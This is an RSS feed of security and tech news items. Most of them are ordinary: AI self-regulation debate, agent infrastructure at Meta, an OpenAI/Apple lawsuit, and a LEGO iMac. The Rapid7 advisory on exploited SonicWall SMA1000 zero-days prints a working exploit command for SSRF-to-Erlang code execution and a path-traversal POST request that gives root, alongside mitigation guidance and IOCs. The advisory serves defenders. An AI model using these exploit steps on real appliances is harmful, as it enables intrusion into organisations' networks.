<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/carmi/" target="_blank" rel="noreferrer noopener">Carmi Levy</a>, an independent technology analyst, was even more emphatically opposed to the Hassabis proposal.</p>



<p class="wp-block-paragraph">“Asking Big Tech companies to self-police is analogous to allowing foxes to guard the henhouse. It hasn’t worked to date, and it won’t work going forward. Expecting these organizations to somehow change their ways at this point in time represents the height of naïve thinking,” Levy said. “The framework proposed by Demis Hassabis is a self-serving roadmap for an industry bent on racing to the AI horizon regardless of the harms caused along the way. It is impossible to quantify the dangers to broader society should frameworks allowing self-regulation become the norm.”</p>



<h2 class="wp-block-heading">Some love the proposal</h2>



<p class="wp-block-paragraph">An almost completely opposite stance came from <a href="https://www.linkedin.com/in/yurigoryunov/" target="_blank" rel="noreferrer noopener">Yuri Goryunov</a>, CIO of consulting firm Acceligence, who applauded the proposed move.</p>



<p class="wp-block-paragraph">“This is one of the rare setups where industry self-regulation has a real shot, and enterprise IT should be enthusiastically rooting for it,” he said. “It fails when harms are externalized, such as in social media content moderation. Or when the overseer outsources judgment to the overseen, such as the FAA’s delegation to Boeing before the 737 MAX. It works when everyone in the industry shares the catastrophic downside.”</p>



<p class="wp-block-paragraph">He suggested, however, that the best precedent here isn’t FINRA, it’s INPO, the Institute of Nuclear Power Operations, which the nuclear industry created within months of the <a href="https://www.nrc.gov/reading-rm/doc-collections/fact-sheets/3mile-isle" target="_blank" rel="noreferrer noopener">1979 Three Mile Island partial reactor meltdown</a> “on the logic that an accident anywhere is an accident everywhere. INPO peer-reviews every US plant, its evaluations move insurance premiums, and it sits on top of the NRC’s statutory floor. That is a public-private stack very close to what Hassabis is describing. Frontier AI has the same structure: one lab’s catastrophic failure brings regulation down on all of them.”</p>



<p class="wp-block-paragraph">For enterprise CIOs and other IT executives, Goryunov said, that model has the potential for being a big win.</p>



<p class="wp-block-paragraph"><strong>“</strong>Today, every enterprise duplicates the same AI diligence of red-teaming, eval suites, governance committees and each does so with less information than any certifying body would have,” Goryunov said. “A credible standards regime does for AI what UL did for electrical equipment and SOC2 did for cloud: it converts an unknowable risk into a procurable product and gives boards a defensible standard of care. That’s not red tape. That’s peace of mind with an audit trail.”</p>



<p class="wp-block-paragraph">However, Mahapatra said, “the countervailing view is that the alternative to industry-led standards is probably not thoughtful legislation. It is probably no standards, or state-by-state fragmentation, or the current pattern of ex-post enforcement actions where regulators surface concerns years after harm has already occurred.” </p>



<p class="wp-block-paragraph">Thus, he noted, “Hassabis is making the reasonable argument that imperfect fast standards are better than perfect slow ones, and there is genuine merit to that view for topics like agent identity, evaluation methodology, and interoperability, which are exactly the areas <a href="https://www.computerworld.com/article/4196365/openclaw-becomes-a-nonprofit-foundation-as-it-seeks-to-be-the-switzerland-of-ai.html" target="_blank">OpenClaw is also targeting</a>.”</p>



<p class="wp-block-paragraph"><em>This article originally appeared on CIO.com.</em></p>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Rapid7 MDR Team Discovers New SonicWall SMA1000 Zero Days being Actively Exploited (CVE-2026-15409, CVE-2026-15410)]]></title>
<description><![CDATA[OverviewOn July 14, 2026, SonicWall published a security advisory addressing two vulnerabilities affecting SMA1000 Series remote access appliances, including the critical server-side request forgery (SSRF) vulnerability CVE-2026-15409 (CVSS 10.0) and the high-severity code injection vulnerability...]]></description>
<link>https://tsecurity.de/de/3671466/it-security-nachrichten/rapid7-mdr-team-discovers-new-sonicwall-sma1000-zero-days-being-actively-exploited-cve-2026-15409-cve-2026-15410/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671466/it-security-nachrichten/rapid7-mdr-team-discovers-new-sonicwall-sma1000-zero-days-being-actively-exploited-cve-2026-15409-cve-2026-15410/</guid>
<pubDate>Wed, 15 Jul 2026 19:24:03 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>Overview</h2><p><span>On July 14, 2026, SonicWall </span><a href="https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2026-0008" target="_blank"><span>published</span></a><span> a security advisory addressing two vulnerabilities affecting SMA1000 Series remote access appliances, including the critical server-side request forgery (SSRF) vulnerability </span><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-15409" target="_blank"><span>CVE-2026-15409</span></a><span> (CVSS 10.0) and the high-severity code injection vulnerability </span><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-15410" target="_blank"><span>CVE-2026-15410</span></a><span>. The advisory urges customers to immediately apply the latest platform hotfix releases.</span></p><p><span>Successful exploitation of CVE-2026-15409 permits an unauthenticated attacker to open a websocket-based tunnel to arbitrary localhost-only services, while CVE-2026-15410 is a local privilege escalation that permits an attacker with access to an internal service listening on port 8188 on localhost to execute arbitrary operating system commands as root via a malicious path traversal-based </span><span><span data-type="inlineCode">remove_hotfix</span></span><span> workflow.</span></p><p><span>Both vulnerabilities are being actively exploited in the wild. Prior to SonicWall’s official vulnerability disclosure, Rapid7’s Managed Detection and Response team observed active, targeted zero-day exploitation of internet-facing SMA 1000-series appliances. In the SonicWall advisory, exploitation in the wild was </span><a href="https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2026-0008#EITW" target="_blank"><span>noted</span></a><span>, and both </span><a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-15409" target="_blank"><span>CVE-2026-15409</span></a><span> and </span><a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-15410" target="_blank"><span>CVE-2026-15410</span></a><span> have been added to CISA's Known Exploited Vulnerabilities (</span><a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog" target="_blank"><span>KEV</span></a><span>) catalog. Given the confirmed exploitation activity and the critical unauthenticated impact of the vulnerabilities, organizations should prioritize remediation of SMA1000 appliances on an emergency basis. A Python proof-of-concept for CVE-2026-15409 is available </span><a href="https://github.com/remmons-r7/rapid7-CVE-2026-15409"><span>here</span></a><span> for exposure validation, and a Metasploit module for the chain is in development.</span></p><p><span>Affected products include SonicWall SMA1000 Series models 6210, 7210, and 8200v running:</span></p><ul><li><p><span>12.4.3-03245</span></p></li><li><p><span>12.4.3-03387</span></p></li><li><p><span>12.4.3-03434 (platform-hotfix)</span></p></li><li><p><span>12.5.0-02283</span></p></li><li><p><span>12.5.0-02624</span></p></li><li><p><span>12.5.0-02800 (platform-hotfix)</span></p></li></ul><p><span>These vulnerabilities do not affect SSL VPN functionality on SonicWall firewalls or the SMA 100 Series product line.</span></p><h2>Technical overview</h2><p><span>The primary vulnerability is in a websocket proxy feature, accessed via the path /wsproxy on the affected “SonicWall WorkPlace” application (served on port 443 by default). This feature permits a netcat-like TCP tunnel to arbitrary hosts and ports, which are provided by the user in URL parameters. By providing host values that point to localhost, the attacker can access local SonicWall appliance system services behind the firewall to send and receive arbitrary TCP traffic to and from them. This is the first-stage vulnerability, CVE-2026-15409, that Rapid7 MDR analysts are seeing attackers exploiting in the wild. With this capability, an attacker can reach and exploit less-hardened services running on the appliance, such as the Erlang application on localhost:1050 or the ctrl-service application on localhost:8188. </span></p><p><span>We developed an exploit targeting the Erlang process listening on localhost:1050 for remote code execution. Note that the provided cookie value is hardcoded for the Erlang process, based on our testing, so authentication is not required to establish code execution.</span></p><pre language="html"># python3 cve-2026-15409.py --ws-url 'wss://192.168.1.46/wsproxy?bmID=-3389c1b25ccd&amp;serviceType=SSH&amp;host=0.0.0.0&amp;port=1050' --ws-user-agent 'SMA Connect Agent' --ws-insecure-tls --cookie 10ecad5b446e86864832904cd439b6b70262 --exec 'whoami &amp;&amp; id &amp;&amp; pwd &amp;&amp; hostname'
Authenticated to couchdb@127.0.0.1
Peer flags: 0xd07df7fbd
Peer creation: 1784069352
RPC os:cmd/1 =&gt; couchdb
uid=1010(couchdb) gid=1(daemon) groups=1(daemon)
/opt/couchdb
SMAAppliance.sma</pre><p><span></span></p><p><span>With code execution established, the attacker can escalate to root on the appliance by exploiting CVE-2026-15410, which is a path traversal in the remove_hotfix workflow of ctrl-service. This can be performed via the web console or by hitting port 8188 on the device. The attacker provides a hotfix value containing a path traversal sequence to a malicious script, such as “../../../../var/tmp/privesc”. The system executes the script as root and (typically) reboots the appliance immediately after.</span><br><span>An example malicious request achieving privilege escalation by leveraging this from the web panel is depicted below:</span></p><pre language="html">POST /rollbackConfirm.action HTTP/1.1
Host: 192.168.181.46:8443
Cookie: EXTRAWEB_REFERER=%252F; JSESSIONID=node01bcg1tbiy6qi7s97xsoa42lhp8.node0
Content-Length: 134
Cache-Control: max-age=0
Sec-Ch-Ua: "Not?A_Brand";v="24", "Chromium";v="152"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/152.0.0.0 Safari/537.36
Origin: https://192.168.181.46:8443
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://192.168.181.46:8443/rollbackConfirm.action
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Connection: keep-alive

csrfToken=GFEJUCQBUZOLUCCOO3YBA8G30ZE9VKDP&amp;command=rollback&amp;rollbackUpgradeTime=&amp;hotfix=../../../../../tmp/1234.sh&amp;rollbackHotfixTime=</pre><p><span></span></p><p><span>If the provided hotfix file does not exist, a reboot does not occur. If the provided file exists, the system reboots after it chmods and executes the file. Below is a system monitor (pspy) depicting output of this occurring during exploitation:</span></p><pre language="html">2026/07/09 23:21:00 CMD: UID=0     PID=10355  | chmod +x /var/lib/aventail/avp/rollback/../../../../../tmp/1234.sh
2026/07/09 23:21:00 CMD: UID=0     PID=10355  | /bin/bash /var/lib/aventail/avp/rollback/../../../../../tmp/1234.sh --unattended
2026/07/09 23:21:00 CMD: UID=0     PID=10361  | /usr/bin/python3 /usr/local/ctrl-service/bin/ctrl-service.py
[...]
2026/07/09 23:21:22 CMD: UID=0     PID=11124  | shutdown -r now</pre><p><span></span></p><p><span>A Python proof-of-concept for CVE-2026-15409 is available </span><a href="https://github.com/remmons-r7/rapid7-CVE-2026-15409" target="_blank"><span>here</span></a><span>; a Metasploit module for the chain is in development.</span></p><h2>Mitigation guidance</h2><p><span>Organizations operating SonicWall SMA1000 appliances should </span><span><strong>immediately upgrade</strong></span><span> to the latest platform hotfix releases.</span></p><p><span>Fixed versions are:</span></p><table><colgroup data-width="609"><col><col></colgroup><thead><tr><th><p><span>Product</span></p></th><th><p><span>Fixed Version</span></p></th></tr></thead><tbody><tr><td><p><span>SMA1000 Series (6210, 7210, 8200v)</span></p></td><td><p><span>12.4.3-03453 (platform-hotfix) or later</span></p></td></tr><tr><td><p><span>SMA1000 Series (6210, 7210, 8200v)</span></p></td><td><p><span>12.5.0-02835 (platform-hotfix) or later</span></p></td></tr></tbody></table><p><span></span></p><p><span>There are </span><span><strong>no workarounds</strong></span><span> available.</span></p><p><span>Because active exploitation has been confirmed, organizations should not rely solely on patching. SonicWall additionally recommends:</span></p><ul><li><p><span>Performing a thorough forensic review for indicators of compromise.</span></p></li><li><p><span>Re-imaging physical appliances or redeploying virtual appliances if compromise is identified.</span></p></li><li><p><span>Changing user and administrator passwords.</span></p></li><li><p><span>Resetting TOTP tokens following confirmed compromise.</span></p></li></ul><p><span>Customers should consult the SonicWall security advisory for the latest remediation guidance and platform hotfix availability.</span></p><h2>Observed exploitation</h2><p><span>Prior to SonicWall’s official vulnerability disclosure, our Managed Detection and Response team observed active, targeted exploitation of internet-facing SMA 1000-series appliances. Threat actors were primarily leveraging the perimeter appliance as a stealthy initial access vector, executing commands on the operating system by bypassing traditional input validation controls. Once they established a foothold on the appliance, the actors systematically extracted high-value credentials, active session databases, and Time-Based One-Time Password (TOTP) multi-factor authentication (MFA) seed configurations. This local harvesting was designed to ensure long-term, persistent access that could survive standard network-level remediations.</span></p><p><span>With these harvested resources, the threat actors quickly shifted to lateral movement, pivoting from the compromised appliance directly into the internal corporate network. Specifically, we observed a sequence of anomalous, VPN-less Active Directory authentications targeting core domain controllers. These authentications originated directly from the appliance’s internal IP address, using atypical, non-corporate workstation client names (such as kali or other non-inventory hostnames) under the context of the appliance’s integrated LDAP service account. This unique behavior of direct, machine-level lateral movement with no corresponding active VPN tunnel confirmed that the appliance itself had been fully compromised and was acting as an unmonitored backdoor into the corporate directory infrastructure.</span></p><h2>Artifacts or evidence sources and IOCs</h2><p><span>Rapid7 recommends reviewing appliance logs for evidence of active exploitation, including the following characteristic behaviors and specific log indicators:</span></p><h3><span>Characteristic Behaviors</span></h3><ul><li><p><span><strong>Websocket exploit IOC log patterns:</strong></span><span> extraweb_access.log entries containing the strings ("GET" AND "wsproxy" AND "=-3389" AND “ 101 “) indicate interactions with the niche affected service. If suspicious host parameter values such as “0.0.0.0”, “localhost”, or “::ffff:127.0.0.1” are present, that’s indicative of likely exploitation of CVE-2026-15409. Note that “serviceType=SSH” was used in our published materials, but options such as “serviceType=TELNET” are viable alternatives.</span></p></li><li><p><span><strong>Hotfix removal exploit IOC log patterns:</strong></span><span> The ctrl-service.log shows the hotfix-removal utility (/usr/local/bin/remove_hotfix) being invoked with traversal sequences pointing to attacker-staged shell script payloads (e.g., ../../../../../../tmp/sma1000_5c47.sh). This is indicative of successful exploitation of CVE-2026-15410.</span></p></li><li><p><span><strong>Internet-facing probing:</strong></span><span> Enumeration of the SMA portal, including repeated requests to /auth1.html, path-traversal attempts, and generic file/enumeration requests (e.g., /.env, /api/sonicos/is-sslvpn-enabled).</span></p></li><li><p><span><strong>Authentication activity:</strong></span><span> Authentication-API activity against /__api__/logon/&lt;session-id&gt;/authenticate.</span></p></li><li><p><span><strong>Sensitive path access:</strong></span><span> Access to sensitive appliance paths such as /tmp/temp.db*, consistent with theft of stored session data.</span></p></li><li><p><span><strong>AD/Service Account Compromise:</strong></span><span> NTLM logons (Windows Event ID 4624, logon type 3) into internal domain controllers sourced from the appliance's internal IP address, using attacker-controlled workstation names (e.g., kali) without a corresponding VPN session.</span></p></li></ul><ul><li><p><span><strong>extraweb_access.log:</strong></span><span> Requests to /__api__/login or /__api__/logout returning HTTP 200, and requests to /wsproxy containing suspicious host parameters returning HTTP 101.</span></p></li></ul><h3><span>Configuration artifacts</span></h3><ul><li><p><span>/var/lib/unit/conf.json containing routes for /__api__/login or /__api__/logout, which are not present in legitimate configurations.</span></p></li></ul><h3><span>Atomic Indicators</span></h3><ul><li><p><span><strong>F.N.S Holdings Limited (ASN - 206092): </strong></span><span>The threat actor(s) utilized varying IP addresses, but they belonged to the VPN hosting provider FNS Holdings Limited. Limit or block access to FNS Holdings Limited if there is no business need. For reference, the IP addresses we observed were:</span></p></li><ul><li><p><span>45.131.194.0/24</span></p></li><li><p><span>45.146.54.0/24</span></p></li><li><p><span>63.135.161.0/24</span></p></li><li><p><span>173.239.211.0/24</span></p></li><li><p><span>193.37.32[.]179</span></p></li><li><p><span>193.37.32[.]214</span></p></li><li><p><span>216.73.163[.]151</span></p></li><li><p><span>216.73.163[.]158</span></p></li></ul></ul><p><span>If any indicators of compromise are identified, organizations should treat the appliance as compromised and follow SonicWall’s recovery guidance.</span></p><h2>Rapid7 customers</h2><p><span>Organizations should prioritize identifying all internet-facing SonicWall SMA1000 appliances and determine whether affected software versions remain deployed. Given SonicWall’s and Rapid7’s confirmation of active exploitation, exposed appliances should be considered high-priority assets for remediation.</span></p><p><span>Security teams should also review available authentication, web access, and appliance management logs for the indicators published by SonicWall to determine whether follow-up incident response activities are warranted.</span></p><h3>Exposure Command, InsightVM, and Nexpose</h3><p><span>Exposure Command, InsightVM, and Nexpose customers will be able to assess exposure to </span><span><strong>CVE-2026-15409</strong></span><span> and </span><span><strong>CVE-2026-15410</strong></span><span> with authenticated vulnerability checks available in the July 15 content release.</span></p><h2>Updates</h2><p><span><strong>July 15, 2026:</strong></span><span> Initial publication.</span></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Your Smart TV Could Be Working for Hackers | Threat Wire]]></title>
<description><![CDATA[Author: Hak5 - Bewertung: 69x - Views:439 ⬇️ OPEN FOR LINKS TO ARTICLES TO LEARN MORE ⬇️


@endingwithali →
Twitch: https://twitch.tv/endingwithali
Twitter: https://twitter.com/endingwithali
YouTube: https://youtube.com/@endingwithali
Everywhere else: https://links.ali.dev

Want to work with Ali?...]]></description>
<link>https://tsecurity.de/de/3671382/it-security-video/your-smart-tv-could-be-working-for-hackers-threat-wire/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671382/it-security-video/your-smart-tv-could-be-working-for-hackers-threat-wire/</guid>
<pubDate>Wed, 15 Jul 2026 18:35:37 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Hak5 - Bewertung: 69x - Views:439 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/j_rKXznEMvE?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>⬇️ OPEN FOR LINKS TO ARTICLES TO LEARN MORE ⬇️<br />
<br />
<br />
@endingwithali →<br />
Twitch: https://twitch.tv/endingwithali<br />
Twitter: https://twitter.com/endingwithali<br />
YouTube: https://youtube.com/@endingwithali<br />
Everywhere else: https://links.ali.dev<br />
<br />
Want to work with Ali? hak5@endingwithali.com<br />
<br />
[❗] Join the Patreon→ https://patreon.com/threatwire<br />
0:00 0 - Intro<br />
1 - Your Local Botnet<br />
2 - Charging For Internet<br />
3 - Scattered Spider<br />
4 - BSides News<br />
5 - Outro<br />
<br />
LINKS<br />
🔗 Story 1: Your Local Botnet<br />
https://cloud.google.com/blog/topics/threat-intelligence/google-continued-disruption-residential-proxy-networks<br />
https://www.bleepingcomputer.com/news/security/netnut-proxy-network-disrupted-2-million-infected-devices-cut-off/<br />
https://thehackernews.com/2026/07/google-disrupts-netnut-residential.html<br />
🔗 Story 2: Charging For Internet<br />
https://blog.cloudflare.com/monetization-gateway/<br />
https://blog.cloudflare.com/introducing-pay-per-crawl/<br />
🔗 Story 3: Scattered Spider<br />
https://www.helpnetsecurity.com/2026/07/02/scattered-spider-criminal-group-suspect-extradited/<br />
https://www.bleepingcomputer.com/news/security/alleged-scattered-spider-hacker-extradited-to-the-united-states/<br />
https://thehackernews.com/2026/07/19-year-old-scattered-spider-suspect.html<br />
🔗 Story 4: BSides News<br />
https://cybersecuritynews.com/pamstealer-mimic-as-maccy-harvest/<br />
https://arstechnica.com/security/2026/07/new-pamstealer-macos-malware-uses-clever-tradecraft-to-remain-stealthy/<br />
https://thehackernews.com/2026/06/rustduck-botnet-rebuilds-in-rust-to.html<br />
https://openai.com/index/previewing-gpt-5-6-sol/<br />
https://arstechnica.com/information-technology/2026/06/us-offers-10-million-for-info-on-group-behind-signal-and-whatsapp-hacking-spree/<br />
-----☆-----☆-----☆-----☆-----☆-----☆-----☆-----☆-----☆-----☆<br />
Our Site → https://www.hak5.org<br />
Shop →  http://hakshop.myshopify.com/<br />
Community → https://www.hak5.org/community<br />
Subscribe → https://www.youtube.com/user/Hak5Darren?sub_confirmation=1<br />
Support → https://www.patreon.com/threatwire<br />
Contact Us → http://www.twitter.com/hak5<br />
____________________________________________<br />
<br />
Founded in 2005, Hak5's mission is to advance the InfoSec industry. We do this through our award winning educational podcasts, leading pentest gear, and inclusive community – where all hackers belong.<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Nostalgic Bondi Blue iMac G3 Could Become An Official LEGO Set]]></title>
<description><![CDATA[Do you remember the colorful translucent computers from the late nineties? A dedicated fan builder has created an impressive replica of the classic 1998 Bondi Blue iMac G3 using standard building blocks. This creative project recently gained massive support online and is now officially under revi...]]></description>
<link>https://tsecurity.de/de/3671310/ios-mac-os/nostalgic-bondi-blue-imac-g3-could-become-an-official-lego-set/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671310/ios-mac-os/nostalgic-bondi-blue-imac-g3-could-become-an-official-lego-set/</guid>
<pubDate>Wed, 15 Jul 2026 18:11:45 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Do you remember the colorful translucent computers from the late nineties? A dedicated fan builder has created an impressive replica of the classic 1998 Bondi Blue iMac G3 using standard building blocks. This creative project recently gained massive support online and is now officially under review by the manufacturer.



If everything falls into place, you might soon be able to build a physical piece of computer history right on your desk.



The fan design features clear blue bricks and internal details



The proposed set comes from a creator named terauma on the official Ideas platform. This builder used exactly 700 pieces to recreate the famous desktop computer in stunning accuracy. The model perfectly captures the original retro aesthetic by using see through blue parts for the distinctive outer shell.



When you look closer, the attention to detail becomes even more obvious. The builder thoughtfully included small versions of the internal circuit boards and the heavy cathode ray tube monitor inside the casing. The whole package also features matching desktop accessories. Builders get to piece together the famous round hockey puck mouse and the classic keyboard with clear cables. It is a perfect tribute to the original Mac that helped reshape the personal computing market.



The final approval completely depends on passing strict licensing hurdles



The project recently reached a major milestone by gathering 10,000 votes from community supporters. This huge number means the toy company must formally review the idea for mass production. Currently, the set is sitting in a special parking lot status. This simply means the review board needs extra time to make a final decision, which is actually a very positive sign instead of an instant rejection.



The biggest challenge now is getting official permission from Apple to sell a branded product. The hardware maker is famously strict about its intellectual property and rarely approves third party merchandise. A previous fan project for a brick built retail store was quickly denied.



However, the extended review time suggests the two companies might be actively talking. If the tech brand decides to embrace its own history, this colorful kit could become a massive hit for vintage computer fans everywhere.]]></content:encoded>
</item>
<item>
<title><![CDATA['We have maybe 20 months' to rebuild for AI agents, Meta's infrastructure VP tells VB Transform 2026]]></title>
<description><![CDATA[Organizations need to transform to meet the needs of agentic AI.Meta VP of Engineering Barak Yagour opened his talk at VB Transform 2026 wearing a pair of Ray-Ban Meta AI glasses, a small sign of how far AI has already worked its way into physical life. His argument went further: enterprise infra...]]></description>
<link>https://tsecurity.de/de/3671199/it-nachrichten/we-have-maybe-20-months-to-rebuild-for-ai-agents-metas-infrastructure-vp-tells-vb-transform-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671199/it-nachrichten/we-have-maybe-20-months-to-rebuild-for-ai-agents-metas-infrastructure-vp-tells-vb-transform-2026/</guid>
<pubDate>Wed, 15 Jul 2026 17:33:05 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Organizations need to transform to meet the needs of agentic AI.</p><p>Meta VP of Engineering Barak Yagour opened his talk at<a href="https://venturebeat.com/vbtransform2026"> VB Transform 2026</a> wearing a pair of Ray-Ban Meta AI glasses, a small sign of how far AI has already worked its way into physical life. His argument went further: enterprise infrastructure was built for humans, not for agents, and it's starting to show.</p><p>Yagour, who leads its data infrastructure organization, told the audience that agentic queries hitting Meta's data systems grew 30x in a single half, an inversion that he said is breaking assumptions the company spent two decades building around.</p><p>The shift is not confined to Meta. Automated traffic overtook human traffic on the internet last year, reaching 51% of the total, according to <a href="https://www.imperva.com/resources/resource-library/reports/2025-bad-bot-report/">Imperva's 2025 Bad Bot Report</a>. That traffic is also growing roughly eight times faster than human traffic, according to <a href="https://www.humansecurity.com/2026-state-of-ai-traffic-cyberthreat-benchmark-report/">HUMAN Security's 2026 State of AI Traffic report</a>. Yagour cited both figures to describe what he called an inflection point already underway inside his own organization.</p><p>Yagour framed the shift as an open question for infrastructure teams everywhere. "What happens to the infrastructure we've spent years building when agents and not humans become the main consumers of that," Yagour said. "That's the world we're stepping into."</p><h2>Capacity, identity and velocity are breaking at once</h2><p>Yagour said three assumptions are breaking simultaneously inside Meta's infrastructure: capacity, identity and velocity.</p><p>On capacity, the math no longer works the way engineering teams are used to. "One engineer used to mean one unit of load," he said. "Now one engineer spawns 10 agents, each spawning subagents. Your 1,000-person org can generate the load of 100,000 users practically overnight."</p><p>His answer is not to block agent traffic but to make infrastructure agent-aware, with dynamic controls that understand agent hierarchies, cost attribution that traces consumption back to the use case that spawned it, and throttling that adapts based on priority.</p><p>Identity is breaking, too. Yagour said an agent does not fit the categories infrastructure teams built access controls around. It is not a human user, it does not carry a badge and it is not a deployed service, yet it makes decisions on its own.</p><p>Velocity is the third assumption under strain. Yagour cited a company-reported figure that GitHub Copilot writes 46% of the average user's code, then noted that faster code generation does not make the rest of the pipeline faster.</p><p>"That code still needs to be built, tested, deployed, monitored," he said. "The agent writes the code in seconds, but your CI/CD pipeline doesn't get faster just because the machine is the author."</p><h2>Trusted data environments keep agents inside guardrails</h2><p>Data is where Yagour said the pressure from agents is most direct. </p><p>"Data sits at the center of everything," he said, pointing to the decisions, products, recommender systems and next generation models it drives.</p><p>Meta is also rethinking how much autonomy to grant agents inside its own data systems. In February, the company shipped what Yagour called agentic data apps. Within three months, 63% of dashboards published across Meta were built using the new tooling, part of the same 30x rise in agentic queries Yagour cited earlier.</p><p>That growth raises a governance question. Human analysts have traditionally sat between raw data and business decisions, curating it and serving as an informal check on quality. Yagour said Meta wants to grant agents more independence on harder problems, but was direct about the risk. </p><p>"Autonomy without governance is nothing but chaos," he said. That's why the company built what it calls trusted data environments, to preserve the human check as agents take on more of that work.</p><p>"Inside, the agent can explore data freely, but every output is traced back to its source and scrutinized. So you always know that the data shared back is trusted and governed," Yagour said.</p><p>Sensitive fields are masked before an agent can reach them, and every access request is evaluated in real time against what the agent is trying to reach, why and whether it is allowed. Yagour summarized the approach as exploring broadly while releasing narrowly.</p><h2>Reasoning models are rewriting the data layer</h2><p>Meta's models are also demanding more from data as they shift from correlation to reasoning. </p><p>"Reasoning is data hungry," Yagour said. </p><p>Pattern matching works on sparse, summarized signals. Reasoning demands the full behavioral history, every interaction across every surface over time. Yagour pointed to two shifts already underway inside Meta's infrastructure to keep up.</p><p><b>Real-time streaming is replacing batch ETL for ranking pipelines.</b> A pipeline that takes 24 hours to run is not viable when a model is reasoning about a user's current intent. Yagour said real-time streaming, not batch extract-transform-load processing, is becoming the backbone of Meta's ranking and recommendation systems.</p><p><b>Storage is becoming schema-aware to stop GPU starvation.</b> Meta previously stored user data as opaque blobs with no awareness of what the data contained, which Yagour said led to heavy overfetching and idle GPU capacity. The company is now building storage that understands what it holds, pulling only the columns and time ranges a given query needs. Yagour said Meta is building toward 500 million queries per second and a petabyte per second of throughput for training data reads.</p><p>That data feeds directly into how Meta's recommendation systems behave. Yagour said 42% of Instagram users have told the company they want to fundamentally change the algorithm, not adjust a single session or setting. Meta's response is what Yagour called fully conversational recommendations, where a user tells the system what they want more of and it reasons about intent rather than matching on keywords. Yagour said the same search term, soccer, would return different results for a casual fan looking for highlights than for a club athlete seeking training drills, because the system would reason about which one is asking.</p><p>Yagour described the three threads of his talk, agents, data and recommendations, as reinforcing each other rather than moving independently. </p><p>"Agents make data more accessible. Better data makes reasoning. Reasoning creates new demands that push agents and infrastructure forward," he said. "This isn't linear; it's a flywheel."</p><p>During the Q&amp;A, an audience member asked whether Meta's push toward more intelligent infrastructure signals the end of traditional file systems in favor of newer neural storage approaches, and whether agents will keep using SQL as their interface to data the way humans do. Yagour said Meta is experimenting at every level, including questioning whether SQL is the right interface for agents at all, and that storage at Meta's scale already operates in the multi-digit exabyte range and needs to keep expanding.</p><p>Yagour closed his talk with the timeline he believes the industry is working against. "We spent 20 years building infrastructure for humans. We have maybe 20 months to rebuild the whole thing for a world where humans and agents co-create at scale," Yagour said. "The window is open, but it won't stay open for long."</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI Says Apple Lawsuit Has No Evidence Supporting Trade Secret Claims]]></title>
<description><![CDATA[Apple's legal battle with OpenAI has entered a new phase after the AI company issued a stronger response to the lawsuit accusing it of trade secret theft. OpenAI said it takes Apple's allegations seriously, but added that it is not aware of any evidence showing the complaint has merit. 



The la...]]></description>
<link>https://tsecurity.de/de/3669903/ios-mac-os/openai-says-apple-lawsuit-has-no-evidence-supporting-trade-secret-claims/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3669903/ios-mac-os/openai-says-apple-lawsuit-has-no-evidence-supporting-trade-secret-claims/</guid>
<pubDate>Wed, 15 Jul 2026 09:36:50 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple's legal battle with OpenAI has entered a new phase after the AI company issued a stronger response to the lawsuit accusing it of trade secret theft. OpenAI said it takes Apple's allegations seriously, but added that it is not aware of any evidence showing the complaint has merit. 



The latest statement comes just days after Apple claimed OpenAI and several former Apple employees used confidential hardware information to support the company's growing consumer device ambitions.



According to Bloomberg, OpenAI expanded on its earlier response, which had focused on the company's commitment to developing its own technology rather than relying on information from competitors.



OpenAI says Apple's complaint lacks supporting evidence



In its latest statement, OpenAI said:




"While we take these allegations seriously, we're not aware of any evidence that this complaint has merit. We believe in fair competition and allowing people the freedom to work wherever they choose, and we're focused on building innovative technology that empowers people everywhere."




The company repeated its position that it supports fair competition and employee mobility while continuing to build its own products. OpenAI's earlier public response also said it has "no interest in other companies' trade secrets."



Apple's lawsuit paints a very different picture. The company claims OpenAI's chief hardware officer, who previously led iPhone design efforts, encouraged Apple employees to bring hardware-related components to job interviews. Apple also alleges OpenAI created a hiring process that helped employees avoid the company's security procedures during recruitment.



